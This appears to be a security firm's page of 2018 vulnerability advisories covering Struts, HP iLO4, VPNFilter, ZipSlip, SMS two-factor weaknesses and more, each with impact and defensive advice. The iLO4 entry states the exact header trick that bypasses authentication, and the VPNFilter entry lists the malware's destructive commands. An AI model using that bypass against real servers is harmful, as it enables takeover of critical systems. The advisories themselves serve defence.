Jay Beale, InGuardians Founder and CTO, will be speaking this weekend at ToorCon in San Diego.  His talk, “Hacking and Hardening Kubernetes” focuses on exploiting the technology’s weaknesses and then using its features to lock it down.  Track: Seminars, When: 9.14.18 at 16:00 PST. For more information:

InGuardians will sponsoring Idaho Falls’ first BSides event this weekend.  Stop by our booth and chat with our Head of Offensive Services and Idaho local, Tyler Robinson.  For more information:

08/28/2018 Apache Struts 2 RCE Vulnerability Affects Many Web Apps, including products from Aruba Networks, Cisco Systems, and NetApp

Last week, the Apache Struts team publicly announced a severe remote code execution security vulnerability in Apache Struts 2. Similar to the Strutshock vulnerability used in the 2017 Equifax breach, this vulnerability will allow an attacker to run programs of their choice on a web application that uses specific configurations or functionality. The Equifax 2018 breach is considered by many to be the worst corporate breach in US history, wherein bad actors stole personal information, including social security numbers, belonging to 147 million people in the US, or roughly 58% of the US adult population. This vulnerability is present in Apache Struts versions 2.3 – 2.3.34 or 2.5 – 2.5.16.

Applications are vulnerable if they either:

1) use results with no namespace, where its upper actions have no namespace or a wildcard namespace.
2) use a url tag without a value and action set.

Many vendors’ products use Apache Struts 2, in addition to organizations’ internally-developed applications, use Apache Struts 2 as detailed in the next section.

Many web applications and product web front end interfaces are potentially vulnerable. As Apache Struts 2 is a “middleware” web application framework, organizations may not realize that they have web applications susceptiblevulnerable to this vulnerability.  Several vendors have already determined that their products are vulnerable, including Aruba Networks, whose announcement covers its ClearPass servers, Cisco Systems, whose announced 4four vulnerable products, and NetApp, who announced 82 vulnerable products.

Vulnerable products and web applications will allow an attacker full remote control of the host. This canmay  lead to organizational compromise, ransomware attack, or crypto-mining activity, whether on a small scale or through automated worm programs.

As this vulnerability was discovered in April, with some likelihood of independent discovery or leak before patches came available four months later in August, it is especially important to correct vulnerable applications quickly. Staff can accomplish implement the correction by upgrading the Apache Struts 2 framework to either versions 2.3.35 or 2.5.17. If the vulnerable application is provided by a vendor, InGuardians recommends seeking out the vendor’s advisory for corrective action.Additional Resources
Apache Struts Security Bulletin”Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776)” (Semmle Blog) Networks ClearPass Policy Manager Security Advisory ARUBA-PSA-2018-005 Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018 Security Advisory NTAP-20180822-0001 Public Exploits Posted Plugin 112064 (Checks for Vulnerability) 2018-11776
08/20/2018 VIA C3 CPUs Allow Unauthenticated Code Execution

VIA C3 CPUs allow unauthenticated code execution, granting an attacker elevated privileges.  A new tool named project:rosenbridge exploits a backdoor on VIA C3 CPUs.  The C3 chips are found primarily on embedded x86 devices such as: point-of-sale machines, automated teller machines (ATM’s), healthcare hardware, industrial automation devices, and a limited percentage of desktops and laptops.  The chip is a small non-x86 core embedded alongside the x86 main processor.  The “backdoor” in the C3 provides access to debug mode, which should require elevated kernel access to access.  Researchers discovered that unauthenticated access to the backdoor is occasionally enabled by default.  Thus far, neither researchers nor VIA have named which devices shipped with the backdoor on by default.  This exposure allows any unprivileged code to modify the kernel of the operating system.

Impact level of this exposure is high, as it is a remote code execution vulnerability for which there currently are no patches and few workarounds.  Exposure of healthcare devices, ATMs, and industrial automation devices should be taken very seriously.

InGuardians recommends that your organization identify your deployed hardware to determine which machines are affected by this flaw.  Once investigation is complete, enumerate the Windows Active Directory machine accounts corresponding to the affected devices. Each of these machine accounts must have a strong password.  The affected machines must be segregated from the enterprise network with strong network access control. If segregation is not possible, then permit access to the devices on a case-by-case basis, using a white list approach until the a patch is released or the devices reach the end of their life cycle.

Additional Resources

VIA C3 processors (VIA Manufacturer Product Page)

Project:rosenbridge (GitHub project page, Christopher Domas)

08/14/2018 Princeton researchers warn home IoT devices could cause serious issues for utilities
This week, a team of researchers from Princeton University will be presenting their research on home Internet of Things (IoT) devices at the USENIX conference in Baltimore, MD.  They used the grid software packages MATPOWER and Power World to run simulations to determine how many devices, each using how much power, would be required to negatively impact the power grid.  In this case, they based their model on a small Polish power grid from 2008.  They discovered that they could create a “cascading blackout” of 86% of the power grid by arbitrarily and unexpectedly increasing the power demands by only 1%. The researchers were able to cause this increase with a botnet containing as few as 42,000 compromised IoT water heaters.
This awareness has just recently come out of the research phase and there is no current indication of a botnet made up of compromised water heaters.  However, given the history of IoT botnets and their negative impacts, such as with the Mirai botnet in October of 2016, this type of research should be considered an early warning.  In the past, refrigerators,, DVRs, smart TVs, and a whole host of other home IoT devices have been found to be a part of malicious botnets with hundreds of thousands of devices which have caused network outages via distributed denials of service (DDoS) attacks.Utility companies employ experts who predict the level of power requirements and configure generative devices accordingly.  However, this type of attack on the demand side of the equation, involving large home appliances such as water heaters and air conditioners, could hit unexpectedly.
For the consumer, vigilance, and isolation of home IoT devices is key.  Identify IoT devices on your networks, and put in controls and audit measures in order to prevent and detec abuse.  While there are standards in place for devices deployed by the utility companies, such a smart meters, there are currently no secure deployment standards for devices deployed by the homeowner.  InGuardians believes a standard, as such, should be created and a working group assembled to ensure that the risk of these home IoT devices are mitigated.Additional Resources
“A Quick History of IoT Botnets” (Radware)“Mirai (Malware) [Botnet]” (Wikipedia)“How Hacked Water Heaters Could Trigger Mass Blackouts” (Wired)
08/08/2018 Reddit Hack Reveals Flaws in SMS Based Two-Factor Authentication

On June 19th, the popular community messaging site Reddit revealed that it had suffered a successful intrusion of several user accounts, cloud infrastructure, and source code.  Reddit revealed that the data access was read-only. The attacker was unable to modify any website content or user data.  Data accessed included database backups from 2005 to 2007, account credentials (with salted and hashed passwords, email addresses, and email digests (providing a link between e-mail addresses and account names).

The manner in which the attacker was able to gain access to Reddit’s systems is more troubling than this particular compromise of data.  Of the accounts accessed for Reddit’s systems, all claimed to have had Two Factor Authentication (2FA) enabled.  In this particular case the 2FA mechanism on these accounts was purported to have been a PIN delivered via SMS to a mobile device. Typically enabling 2FA is enough to protect these accounts, delivery of PINS via SMS can be compromised in at least two ways.  While we do not know the specific method employed by the attacker in this case the like attack vectors are:

  1. Creation of a rogue cellular tower signal, in order to lure the victim’s mobile devices.  Once connected to the rogue tower, the attacker could perform cellular traffic interception, acting as Man in the Middle (MiTM), ultimately allowing for the recovery of the SMS based PINs for the affected users.
  2. Social engineering the cellular provider customer support call center in order to port the victim’s phone number to a device under the control of the attacker.  This effectively delivers the SMS based PINs directly to the attacker.

While speculative, based on the level of effort for the two attack scenarios it is most likely that the number porting attack was utilized in this scenario.  InGuardians Operators have recently been made aware of similar type of attacks using number porting, however the basis was often to recover account credentials for cryptocurrency.

With a successful compromise of a users 2FA delivery method, through either number porting or rogue cellular tower, it is possible for an attacker to gain unfettered access to a victim network, applications and other credentials. As shown in this example with Reddit, the overall outcome can be quite severe, resulting in complete compromise of the organization.

While creating a rogue cellular tower is non-trivial, the number porting attack scenario is a more likely attack vector.  Taking only the boldness of the attacker to perform appropriate social engineering, this becomes a fairly low barrier to overcome.

As a result of more high profile attacks against 2FA utilizing SMS PIN delivery methods, organizations should carefully review and revise their stance on 2FA implementations.  At this time it is recommended that organizations move away from SMS based 2FA methods to those requiring hardware or software based tokens, in addition to passwords..

For those organizations looking to start 2FA implementations for either their users or customers, it is recommended to avoid the option of SMS based delivery and move right to hardware or software token based authentication, in addition to passwords.

While the adoption of hardware and software based tokens can be more expensive, and more obtrusive for the end user, the overall gain in security is much greater.

Additional Resources
Reddit: We had a security incident. Here’s what you need to know.

Reddit hack shows even strong security measures can be bypassed

07/30/2018 Browsers Begin Marking Unencrypted Sites as “Not Secure”

The lack of HTTPS on a website has slowly become a sign that a company hosting a web application does not understand the impact of unencrypted traffic to their clients. As a result, browser companies have adopted increasingly conspicuous approaches to alert users to the basic risks of unencrypted websites. They have long warned users that entering credentials into an unencrypted page is dangerous. Last week, Google released Chrome 68, which marks unencrypted sites as “Not Secure” in the top URL bar. Mozilla added a similar (albeit a manually activated) feature in 2017 and might soon make it standard. Microsoft and Apple may follow suit.

Most criticism of unencrypted websites describe the risk of some nefarious group reading the web traffic or stealing passwords, but properly-configured HTTPS offers much more than just those protections. Users of properly configured HTTPS websites can be sure of three things:

  • Authentication: The content is provided by the entity they expect.
  • Integrity: The content has not been modified between the server and the browser.
  • Confidentiality: The content is safe from decryption by third parties.

The risk the first two points pose is not theoretical. Numerous countries route all web traffic through a single national proxy. University of Toronto researchers found that one of these national proxies added cryptocurrency mining code to unencrypted websites. Citizens and tourists alike executed this code.

The same report identified two other countries adding state-sponsored malware to unencrypted downloads. This places a company’s customers and traveling personnel (and ultimately the enterprise environment) at risk. Those who notice will point to the company as the culprit, suggesting that it was compromised since the malicious code appeared to come from its site.

Even some US internet service providers (ISPs) have injected content on unrelated sites, and some may still do so. ISPs Verizon, Comcast, and CMA Communications have all been previously identified as modifying traffic passing through their networks.

Ultimately, HTTPS sites will lose the green “Secure” indication as browsers consider it the norm. The currently “Not Secure” text could change to something more ominous. Within hours of the release, some prominent retailers had already implemented HTTPS by default to avoid the potential trust issues. This had likely been planned for some time–enabling HTTPS is often not trivial–but it demonstrated how seriously many companies take the change.

InGuardians recommends that all companies protect their websites and services with a properly-issued HTTPS certificate and updated encryption settings, including mandatory HTTPS. These measures protect your clients, employees, and other users not only from a threat agent obtaining information but also from modifying it in ways that may not be easily detected.

Deployment of HTTPS has become much easier and less expensive, as certificate authorities (CAs) have adopted new models to promote its use. Let’s Encrypt offers free certificates, and some certificate vendors offer wildcard certificates that can be used on an unlimited number of systems.

Additional Resources
Google Chrome 68 Release Notes (Jul 24, 2018)

BAD TRAFFIC: Sandvine’s PacketLogic Devices Used to Deploy Government Spyware in Turkey and Redirect Egyptian Users to Affiliate Ads? (Mar 9, 2018)

Verizon’s “supercookies” violated net neutrality transparency rule (Mar 7, 2016)

Comcast Wi-Fi serving self-promotional ads via JavaScript injection (Sept 8, 2014)

Comcast is still forcing pop-up ads on customers to upsell its modems (Dec 11, 2018)

How a banner ad for H&R Block appeared on—without Apple’s OK (Apr 7, 2013)

Qualys SSL Labs Server Test Strong Ciphers for Apache, nginx, and Lighttpd

Let’s Encrypt: Free Certificates

07/25/2018 “Devil’s Ivy” Flaw Renders Millions of Internet of Things (IoT) Devices Vulnerable

An integer overflow in a library used by security cameras and many other Internet of Things (IoT) devices has been discovered and disclosed by security researchers at Senrio.  While the Senrio researchers demonstrated the exploit against one camera, an AXIS security camera, the vulnerable library, gSOAP by Genivia, is used by many IOT device manufacturers. It is present in 249 distinct Axis camera models alone.

The impact of this vulnerability is likely to grow in the coming weeks, as proof of concept exploits surface and additional vulnerable targets are identified.  Almost one year ago, a flaw in a security camera opened the way a botnet called Mirai botnet to take hold.  At its peak, Mirai compromised more than 600,000 IoT devices and sent distributed denial of service (DDoS) attacks in excess of 1.1 terabits per second, slowing or stopping Internet access for nearly the entire eastern United States for a part of a day.  At this time, there are at least thirteen (13) versions of Mirai active on the Internet.

While the Devil’s Ivy flaw has not yet resulted in a Mirai-style botnet, the announcement of the vulnerability gives us pause to think of the wide ranging consequences of vulnerabilities in widely-deployed devices.  Now is the time to identify the products using the gSOAP library, and check your networks for vulnerable devices.

At the time of this briefing, Axis Communications has not issued a patch for CVE-2017-9765.  Their main recommendation, which InGuardians will echo, is to restrict network access to and from the devices.

Network segmentation, along with controls and audit measures, are the first line of defense here.  This is a remote execution flaw that requires no authentication or credentials, merely network access.

Often times, IOT devices are ignored by organization’s security operations teams, because the devices are either externally managed or simply not managed at all.  It is imperative to identify the systems you have in place, and be sure to spell out ownership and maintenance in an IT governance plan.

IoT security differs in some aspects from traditional IT security as many of these devices provide little in the way of configuration and management.  InGuardians recommends adding IoT devices to your asset inventory, and including them in regular maintenance, and security audits.

Additional Resources
Devil’s Ivy: Flaw in Widely Used Third-party Code Impacts Millions (Senrio, July 18 2018)

Axis Communications Security Advisory for Devil’s Ivy

Genivia advisory for Devil’s Ivy Vulnerability in gSOAP:,_2017%29

CVE Advisory for Devil’s Ivy:

“Devil’s Ivy” Vulnerability Could Afflict Millions of IoT Devices (Wired, July 18, 2018)

How a Dorm Room Minecraft Scam [Mirai] Brought Down the Internet (Wired, December 13, 2017)

Wikipedia Article on Mirai

07/16/2018 HP iLO 4: Simple Authentication bypass can lead to system compromise.

In August of 2017 Hewlett Packard (HP) silently patched an authentication bypass vulnerability in their proprietary Integrated Lights Out (iLO) version 4.  iLO runs on a dedicated baseboard management controller on high end HP servers, to enable remote management even when the operating system itself cannot doesn’t function.  The vulnerability, present in versions prior to 2.54, is particularly concerning because of the criticality of the systems that many organizations utilize HP iLO4 to remotely manage.  These systems include those of the utmost importance in the organization, such as Windows Active Directory domain controllers.This authentication bypass is over a year old and received a CVSS score of 9.8 (out of 10) upon release.  However, it appears that many organizations have NOT patched their systems. Until just recently the researchers who discovered the flaw have been publicly speaking about it.  During recent presentations, it was disclosed that simply including a crafted HTTP host header to the iLO4 device including the phrase “Connection: “ followed by 29 “A” characters.  This simple attack grants full access to the iLO4 subsystem, allowing total control of the host system.  This includes the ability to gain access to the system console as the active user, mount additional file systems (such as various bootable penetration testing linux distributions), and the ability to reboot the hosts systems.

Recently InGuardians operators have successfully leveraged the HP iLO4 authentication bypass using the described scenario to gain full control of active directory where certain conditions were met.  While simple to exploit with tools such as curl under linux, several other PoC code releases, as well as a Metasploit module are available.

HP iLO3 and iLO5 are not affected, as well as iLO4 versions 2.54 and greater.

The impact of this vulnerability will differ based on the overall adoption, use cases, and policies concerning remote system management especially centered around the use of and of iLO4.  However, should the vulnerable version be in use, it is possible for an attacker to gain full control of an organization’s computing infrastructure, depending on the services hosted with iLO4 available.  In cases where lower privilege systems are managed with affected versions iLO4, it can merely provide an initial foothold for an attacker, likely leading to full compromise.

While remote management of systems is critical to effective IT operations, several things should be considered during its use to help protect the overall security of the environment:

PATCH: Add remote management solutions to the critical “short-list” for monitoring for and applying patches.
Evaluate the overall number of staff needed to conduct remote management and limit which systems can access the remote management interfaces through robust network segmentation and firewalling, potentially including the use of well secured jump hosts.
Limit systems in which the remote management can reach, especially for mounting remote filesystems.  Consider mounting of remote file systems from trusted sources, restricted by  robust network segmentation and firewalling.
Establish a policy for login sessions for remote access, specifically for remote terminal sessions.  In cases where privileged accounts can be left “logged in” indefinitely to a remote session, should an attacker access that same session, they gain all of the rights provided by the logged in user.  Set short timeouts for automatic logout for inactivity for remote sessions.

Additional Resources
HP iLO4 vulnerability: authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53:

Subverting your server through its BMC: the HPE iLO4 case [Fabien Périgaud , Alexandre Gazet , and Joffrey Czarny]:

07/09/2018 Google confirms external apps can scan and allow their staff to read your emails.

Google continues to allow outside software developers to “scan the inboxes of millions of Gmail users who signed up for email-based services offering shopping price comparisons, automated travel-itinerary planners or other tools.” (see WSJ report link below) Additionally, people who have connected third-party apps to their accounts may have unwittingly caused human staff permission to read messages those people considered private.Impact
All reports available to date suggest this is a common practice and not limited to Google. In June 2017, Google announced that it would allow users to opt out of its ad personalization via e-mail scanning. It seems that the company instead is allowing third party application developers do so both electronically (machine reading) and via human staff. Google has made statements assuring that these developers are vetted, but remains silent about any subsequent verification of their process.

Many organizations as well as individuals rely on Gmail and similar provider managed email services. This suggests that anything discussed in such emails is potentially exposed to apps and to the developers of those apps. It raises significant questions about the security of email exchanges and highlights the need for organizational policy and practice to mitigate loss of intellectual property and exposure of confidential information.

While that is not new, this is a new vector for exposure. Even if Google’s vetting is sound and developers adhere to reasonable security procedures, we know that data breaches of third parties is a common source of data exposure (see EXACTIS link below). It also raises a question about possible exposure of ANY hosted services. Reporting has limited discussion to Gmail and has been silent about whether or not G Suite “<person>@<company><dot>com“ emails are in the mix.

Review written policies for all external email communication among employees and to clients to ensure they proscribe discussion of sensitive information. Remind staff to remain vigilant about discussing business dealings in emails.

Review written policies to confirm that employees are not permitted to send sensitive organization data via free/consumer-level Gmail or other third-party email providers.

Additional Resources
Wall Street Journal article and report: 

ArsTechnica: Scroogled no more: Gmail won’t scan e-mails for ads personalization

Business Insider article and discussion: 

Wired (UK) news article:
(article is apparently NOT on the US *.com website)

Wired article about EXACTIS breach: 

ABC (Australia) article with a good guide to checking apps: 

07/02/2018 New attacks against LTE networks
Three new attack vectors in the LTE (aka 4G) standard have been unveiled by  researchers from Ruhr-Universität Bochum and New York University Abu Dhabi.  These new vulnerabilities include two passive attacks that allow for identity mapping and website fingerprinting, and one active cryptographic attack called aLTEr.  The last would allow attackers to remotely redirect network connections via DNS spoofing.  The major issue with these new attack vectors is that the flaw is in the standard, which is ubiquitous in mobile communication, and therefore affects ALL devices using LTE.There are three main attack vectors:
Website fingerprinting – identify which sites that users in a radio cell are visiting
Identity mapping – identify individual users in the radio cell
aLTEr – abusing flaws in the standard to redirect network communications via DNS spoofing

The impact of aLTEr and its related attack vectors is large, with hundreds of millions of devices using the vulnerable standard.  Researchers worked with the GSM Association (GSMA) and 3rd Generation Partnership Program (3GPP) along with telephone companies to ensure that all parties responsible for addressing the problem were notified prior to the release of the paper.The three main attacks outlined in the paper (mapping user identities in the radio cell, identifying websites a user visited, and the alteration attack via DNS manipulation) currently require special equipment and knowledge to be performed,  but it will not be long before these attacks are going to show up in the wild.The long term impact will depend on whether the GSMA & the 3GPP will fix the current standard in addition to ensuring that it is fixed in the next generation of the standard (5G).

The impact on individuals is hard to quantify at the moment, but the potential impact to critical infrastructure is serious.  Many of our critical infrastructure systems rely on LTE communications, for example: smart grid relies heavily on  the use LTE networks to transmit data.

The main recommendation for the moment is to identify which parts of your business operations rely on LTE communications and ensure that your vendors are using strong encryption and authentication independent of the LTE layer.Additional Resources
Website for the attack research:
https://alter-attack.netAcademic paper on the research:

Hacker news article:

06/26/2018 Attackers leverage cost of GDPR fines to extort businesses
In what appears to be an exploit of the concept of “the lesser of two evils”, hackers in Europe have began changing the approach of ransom based attacks. Two Bulgarian companies have recently had their data compromised, but instead of encrypting it and demanding that the victim pay up to get the data back, these attackers are threatening to make the data public. This would expose the company to risk of fines with Europe’s General Data Protection Regulation (GDPR) that went into effect in May.  These fines would be upward of 4% of annual revenue.The attackers, acutely aware of the potentially high cost of GDPR fines, typically ask for much less. At their highest, attackers are currently asking for the equivalent of €20,000.  This type of attack may be effective as GDPR is still relatively new, and businesses are still trying to grasp the risk of fines and levels of enforcement.Impact
A wrinkle in this scheme, is that the the GDPR requires companies to report a breach within 72 hours of becoming aware of it, or also face steep fines. As of today, if the company self-reports a breach, they are still liable for the 4% fine. These attacks force the victimized companies to consider the value of profit motive over full compliance with the law.
Due to the level of potential loss, and the possibility of running afoul of European law, companies subject to the GDPR should ensure that they do more than merely meet the minimum regulations of compliance dictated by GDPR. They also should apply defense-in-depth strategies and perform periodic penetration testing to ensure that their most sensitive data is protected in ways that are beyond reproach. Demonstrating that this due diligence has been performed is the only way to avoid a fine in the event of a reportable breach.
06/18/2018 ZipSlip: Vulnerabilities in compression archive file processing can lead to system compromise.


Researchers have demonstrated that multiple file archive extraction libraries, across multiple programming languages, allow an attacker-supplied archive to overwrite arbitrary paths on the filesystem.  In essence, a program using a vulnerable C#, Java, JavaScript, or Go library can unintentionally overwrite files on the machine with attacker-supplied content, granting the attacker remote code execution capability on the system. The file formats known to be affected include: ZIP, tar, jar, war, cpio, apk, rar and 7zip.

This is due to two major factors: vulnerable libraries and lack of centralized file archive extraction libraries. The vulnerable libraries span multiple languages. These include, but may not be limited to:

JavaScript NPM: Unzipper

JavaScript NPM: Admzip

Java: codehaus/plexus-archiver

Java: zeroturnaround/zt-zip

Java: zip4j

C# / .NET: DotNetZip.Semverd

C# / .NET: SharpCompress

C# / .NET: mholt/archiver


Java: commons-compress

C# / .NET: SharpZipLib

Ruby: zip-ruby

Ruby: rubyzip

Ruby: zipruby

Go: archive

The lack of centralized libraries for performing archive file extraction, leading to the development of hand-crafted methods.  These hand-crafted methods often do not feature robust error trapping routines to prevent extracted files from being written outside of the extraction path.  These hand-crafted code “snippets” are often shared publicly (through websites such as StackOverflow) and adopted across many projects.  With these three factors considered, many closed and open source projects are writing or have adopted vulnerable archive file extraction processing.  This issue can result in overwriting of sensitive system files with a malicious file archive, potentially resulting in remote code execution and full system compromise.

The researchers discovering this issue have identified a number of common applications that carry the vulnerability, including the Apache projects: Ant, Hadoop, Hive, Maven, and Storm.  A comprehensive list of these applications can be found at:


The impact of this vulnerability will differ from environment to environment, depending on the various software packages deployed.  However, should an organization be utilizing one of the affected and identified applications, it is possible for a malicious actor to deliver a specifically-crafted archive file to a victim program, which can cause a full system compromise simply by extracting the file.  Because of the nature of the code sharing nature and the affected programming language deficiencies it is highly likely that this issue far exceeds the current identified scope.


Our recommendations fall into two separate categories:

Developers and Enterprise Development operations:

Evaluate the quality of shared code, and fully test it for “outside cases” before implementation.

Integrate the use of shared code evaluation into the DevOps process.

Select and adopt a standard set of libraries for core application functions, and document and standardize on its implementation based on testing results.

Carefully select development languages at the start of any new project, taking into account the use of well developed core libraries essential to the success of the project.

Enterprise adopters:

Perform robust and regular testing of all application input functions at time of adoption and during major code updates or releases.

When possible, perform regular code audits of open source projects in use in the organization in order to discover similar failures.

When possible, encourage your software vendors to perform perform regular code audits in order to discover similar failures.  Ask them to share the results (under NDA or otherwise) so that proper risk decisions  and corrective actions can me made. 

Ultimately all organizations should be mindful of the ZipSlip vulnerability, patch currently identified vulnerable applications, and watch for additional discoveries. Remember, this specific exploit of a vulnerability has revealed previously unknown or only narrowly known general vulnerabilities that may enable many more exploits. 

Additional Resources

ZipSlip Overview:

ZipSlip Release and White Paper:

Current list of known vulnerable software and patch status:


05/29/2018 New “VPNFilter” malware targets at least 500K networking devices worldwide.


Dubbed “VPNFilter” by Cisco’s Talos research group, this multi-stage, modular platform has versatile capabilities to support both intelligence-collection and destructive cyber attack operations. The first stage will persist through a device reboot, enabling downloads of other stages and full reinfection. It also redundantly maintains the IP address(es) of second stage deployments, enabling robust maintenance of the malware command and control (C2) environment even in the face of unpredictable changes, such as those occurring as system administrators attempt to track and remove malware. 


The code collects intelligence (scans) and has multiple attack features that can either execute additional commands or simply “brick” a device. From the Talos blog, “… the code of this malware overlaps with versions of the BlackEnergy malware — which was responsible for multiple large-scale attacks that targeted devices in Ukraine.” That overlap with known attack code and two separate upticks in malware on Ukrainian IP addresses in mid-May 2018 prompted Talos to release information before completing full analysis. 

VPNFilter includes modules to use the Tor anonymity network to mask C2 IP addresses and foster misattribution. It is designed to attack devices on the perimeter of the network, with no intrusion protection system (IPS) in place, and that typically do not have an available host-based protection system such as an anti-virus (AV) package.

Specific sequences in the malware include:

  • kill: Overwrites the first 5,000 bytes of /dev/mtdblock0 with zeros, and reboots the device (effectively bricking it).
  • exec: Executes a shell command or plugin.
  • tor: Sets the Tor configuration flag (0 or 1).
  • copy: Copies a file from the client to the bad actor’s remote server.

The inherent destructive capability is of particular concern because it allows the operators of this malware to ‘brick’ the network connections of any infected organizations. That would eliminate remote operations control for ICS/SCADA systems, as well as shut down any other network connections. The combination of intelligence gathering and mapping seems aimed at finding systems from which to launch effective attacks.


  • Reset SOHO routers and directly-connected NAS devices to factory settings, then update with up to date, non-vulnerable firmware.
  • Work with ISPs to reset devices provided by ISPs
  • For any directly connected device that may be infected or suspect, contact and work closely with manufacturers to ensure devices have up-to-date firmware and that they are not infected.
  • ISP should also work aggressively with customers to address potential problems.

This is a harbinger of IoT risks that will likely become more common. Look at the ‘heat’ map in the SDX Central article below to see this is, at least so far, clearly targeting or being tested against the Ukraine and appears to be a direct descendant of the previously-discovered Russian malware, BlackEnergy. It has, however, also been discovered in 54 other countries, so far. It is not going away.

Additional Resources

Cisco Talos Group blog warns of “VPNFilter” malware

SDX Central – Cisco Warms Massive Russian Malware Attack Hit 500K Routers Globally 

IBM X-Force report on Russian malware BlackEnergy 


05/21/2018 New PDF malware combines recent Windows & Adobe exploits


New PDF malware combines two zero day exploits discovered as recently as last week.  The malware, detected by anti-malware firm ESET, combines the most recent Windows & Adobe exploits to compromise Microsoft Windows operating systems.  The patches for the flaws being exploited have been available for a short period of time; Microsoft released their patches May 8th, with Adobe releasing security patches for Reader and Acrobat on May 14th.  The PDF malware in question compromises Window’s systems when users open an infected PDF on a vulnerable system.  Both the flaws offer remote command execution to the attacker, with the Windows flaw offering System level access. The major impact of this is that these are two new zero day exploits found in a malicious PDF file, in the wild.


The impact of combining two zero days into a lethal piece of malware could be devastating.  How many were hit before the patches?  The end result is not known at this time.  The sample identified by ESET did not contain a final payload, so the initial goal of the malware is not known.  That said, the malware is sophisticated and the zero day exploits embedded in it are more so. 


With zero day exploits in the wild it is usually too late to simply patch your systems.  By all means, we are not advocating delaying in patching your systems, but at this time it is advisable to engage in a full, internal hunt team to identify vulnerable and/or compromised systems.  This is a good reminder that we need to implement the basics first: patch/vulnerability management, software/data inventory, governance etc.  Once shored up, start to look at additional segmentation, access management, application firewalls and white listing.  Zero day exploits are in the wild, and our organizations have to evolve to be resilient against exploits we do not have patches for.

Additional Resources

Microsoft Patch for CVE-2018-8120

Adobe Security Bulletin:

Anton Cherepanov Blog on the two zero days found in PDF malware


05/14/2018 Industrial Control System product vendor Schneider Electric’s InduSoft and InTouch products contain critical security vulnerabilities.


Schneider Electric makes products that allow HMI clients to read, write, tags and monitor alarms and events.  Their InduSoft and InTouch software is vulnerable to remote compromise, and should be patched immediately.


Schneider Electric’s software is often deployed on critical Industrial Control systems, and it’s InduSoft and InTouch applications are vulnerable to remote compromise.  The vulnerable software runs with high privilege level, so compromised systems should be completely wiped and reinstalled before being put back into production.  Given the severity of the vulnerability, and the criticality of the systems we would rate the impact as high.


InGuardians recommends the following steps be taken:

  1. Identify if you run either of the two applications – software inventory
  2. If running the software, ensure that it is running on isolated network segments
  3. Check production systems for indicators of compromise
  4. Patch vulnerable systems &/or rebuild compromised systems

Additional Resources

Schneider Electric Security Bulletin LFSEC00000125

Schneider Electric InduSoft Web Studio and InTouch Machine Edition Remote Code Execution (Tenable Research Advisory Detail)


Tenable Research Advisory: Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability

05/07/2018 Plaintext Passwords Exposed on Twitter and Github, Suggesting Password Safes and MFA


Last week, both Twitter and GitHub publicly announced that their services had exposed plaintext passwords in internal log streams. While neither company has disclosed a compromise, mature information security programs assume that at least one machine in the organization is under the control of a bad actor, and thus that any cleartext password must be replaced. While Twitter has begun requiring some users to change passwords and Github has made no such requirement, it would behoove all users of both Twitter and Github to assume their passwords are compromised.


If one or more bad actors have compromised either Twitter or GitHub, they may possess your organization’s credentials for the respective service. If your organization uses multi-factor authentication (MFA/2FA) for any accounts, the bad actors will likely not have gained access using those accounts.  

A GitHub account compromise produces significant risk in multiple ways. First, if a bad actor can alter code stored on GitHub that a user deploys to your or their own systems, they can achieve an indirect compromise of those systems and any systems accessible by them. Second, a bad actor may find access credentials, private certificate keys, or other secrets stored in GitHub. InGuardians often finds this kind of data in its red team penetration tests, particularly API keys that provide full cloud service administration capabilities. Finally, when targeting a DevOps environment, a bad actor with GitHub access gains full knowledge of routing, firewall and system provisioning code.


InGuardians recommends changing all organization accounts on both Twitter and GitHub. Given the tendency for code and data to proliferate to both personal and business GitHub accounts, InGuardians recommends requiring all staff to change their personal and business GitHub passwords and implement multi-factor authentication on that platform.  

InGuardians also recommends deploying password safe software or hardware, whether free or commercial, to ensure that every password an organization uses is unique. Bad actors will gain access to passwords – to understand, contain and recover from the damage, its important to make sure that compromised passwords are useful only on one service.

Further, InGuardians recommends conducting a quarterly internal review of what code, data and secrets lie in GitHub repositories, to both understand and reduce the amount of sensitive or secret information is entrusted there.

Additional Resources

Twitter Admits Recording Plaintext Passwords in Internal Logs, Just Like GitHub

GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs


04/30/2018 Multiple known Java and HPE iLO vulnerabilities being targeted for ransomware


Software management is often boring. It is, however, essential to business survival. The many “new” attacks the grab media attention all too often exploit known vulnerabilities for which patches have been published – and missed or ignored. Atlanta’s recent ransomware attack exploited Java’s deserialization bug, which was called the most under-hyped vulnerability of 2015. 

It’s is NOT just Java. HPE iLO, an integrated remote management console for HP servers, has many known vulnerabilities. They are now being hit with disconnect and lock out ransom demands. This one may not be encrypting drives, but instead is remotely locking out administrators. The effect and impetus for ransom is the same.


Atlanta’s one case has so far incurred $2.6 million in external consulting costs, there is no capture of internal costs or disruption effects, and as of this writing Atlanta’s departments are still using paper and other offline tools. In many commercial environments, this is a business killer. The iLO attacks effectively take servers offline – they are no longer under your control. 

Any unpatched or unresolved vulnerability is opportunity for exploitation and disaster. Delays in patching increase the window of vulnerability and the likelihood of exploitation. A ‘standardized’ weekly or monthly or worse patch cycle, if known publicly, advertises an organization’s unpreparedness. E.g., Outfit A, Inc., patches on first Mondays of the month; a vulnerability and patch are published in the second week; attackers can posit Outfit A will remain vulnerable AT LEAST 3 weeks … and maybe even into more than one cycle.


1. Do frequent and aperiodic vulnerability assessments. Scan for vulnerabilities and create a realistic, prioritized, ACTION list.

2. Pay attention to other organizations, news, and vulnerability announcements.

3. PATCH. Just Do It. When patches are more complex, mitigate with layered defenses and architecture – network segmentation.

4. Review policy and architecture to ensure systems that should NOT face the internet, such as HPE iLO interfaces, DON’T.

5. And do not let anyone tell you to relax, it’s only a “theoretical vulnerability.” Ever.

In 2015 the Java vulnerabilities “were considered to be theoretical and hard to exploit.”(1)

STOP. That mistaken viewpoint goes back decades – was wrong then and is wrong now. 

Additional Resources

Atlanta fall-out continues

2018 – Atlanta projected to spend at least $2.6 million on ransomware recovery

This is NOT new – it’s been skipped and left to fester:

2015 – Java Serialization Vulnerability Threatens Millions of Applications

… and it persists

2018 – Cisco Secure Access Control System Java Deserialization Vulnerability

(1) 2016 – Lessons Learned from the Java Deserialization Bug

And it is NOT just Java

2018 – Ransomware Hits HPE iLO Remote Management Interfaces

The CVE list of HPE iLO vulnerabilities:

